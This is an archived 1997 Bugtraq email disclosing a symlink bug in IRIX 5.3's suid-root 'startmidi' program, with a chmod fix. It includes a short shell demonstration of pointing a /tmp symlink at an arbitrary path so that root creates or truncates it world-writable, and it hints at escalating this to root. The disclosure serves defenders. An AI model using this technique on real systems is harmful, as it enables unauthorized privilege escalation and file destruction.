From owner-bugtraq@NETSPACE.ORG Sun Feb  9 13:32:47 1997
Return-Path: owner-bugtraq@NETSPACE.ORG
Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by koala.scott.net (8.7.5/8.7.3) with ESMTP id NAA14295; Sun, 9 Feb 1997 13:32:46 -0600
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <36179-21227>; Sun, 9 Feb 1997 14:28:20 -0500
Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with ESMTP id OAA15770; Sun, 9 Feb 1997 14:24:07 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with
          spool id 2690279 for BUGTRAQ@NETSPACE.ORG; Sun, 9 Feb 1997 13:42:14
          -0500
Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org
          (8.8.2/8.8.2) with ESMTP id NAA12240 for <BUGTRAQ@NETSPACE.ORG>; Sun,
          9 Feb 1997 13:41:07 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from dira.bris.ac.uk (dira.bris.ac.uk [137.222.10.41]) by
          netspace.org (8.8.2/8.8.2) with ESMTP id NAA09337 for
          <BUGTRAQ@netspace.org>; Sun, 9 Feb 1997 13:08:45 -0500
Received: from kukini.cs.bris.ac.uk by dira.bris.ac.uk with SMTP (PP); Sun, 9
          Feb 1997 18:11:38 +0000
Received: from maxx by kukini.compsci.bristol.ac.uk id aa24462; 9 Feb 97 18:11
          GMT
Received: from localhost by maxx.cs.bris.ac.uk (SMI-8.6/SMI-SVR4) id SAA16208;
          Sun, 9 Feb 1997 18:11:45 GMT
X-Address: Computer Science Dept., University of Bristol, Bristol, U.K.
X-Work-Phone: +44 (117) 954 5106
X-Attribution: Dave
Message-ID: <16207.855511905@maxx>
Date: 	Sun, 9 Feb 1997 18:11:45 +0000
Reply-To: David Hedley <hedley@CS.BRIS.AC.UK>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: David Hedley <hedley@CS.BRIS.AC.UK>
Subject:      IRIX: Bug in startmidi
To: BUGTRAQ@NETSPACE.ORG
Status: RO
X-Status: 

Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I
noticed a little suid-root program called 'startmidi' which hides in
/usr/sbin. When run, this program creates various files in /tmp. You
guessed it, it respects umask and follows symlinks. Comme ca:

% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw-    1 root     pgrad          0 Feb  9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%

Any existing files are trucated to zero length. New files are created
root-owned, mode 0666. I leave it to your furtive imaginations to get
root from this. 'stopmidi' removes the files created by 'startmidi' so
you may have to run that first if /tmp/.midipid already exists.

chmod -s /usr/sbin/startmidi fixes this problem.

My apologies if this has been documented before but I couldn't find it
anywhere on file and I don't remember it being posted to this list.

Regards,

David
--
 David Hedley (hedley@cs.bris.ac.uk)
 finger hedley@cs.bris.ac.uk for PGP key
 Computer Graphics Group | University of Bristol | UK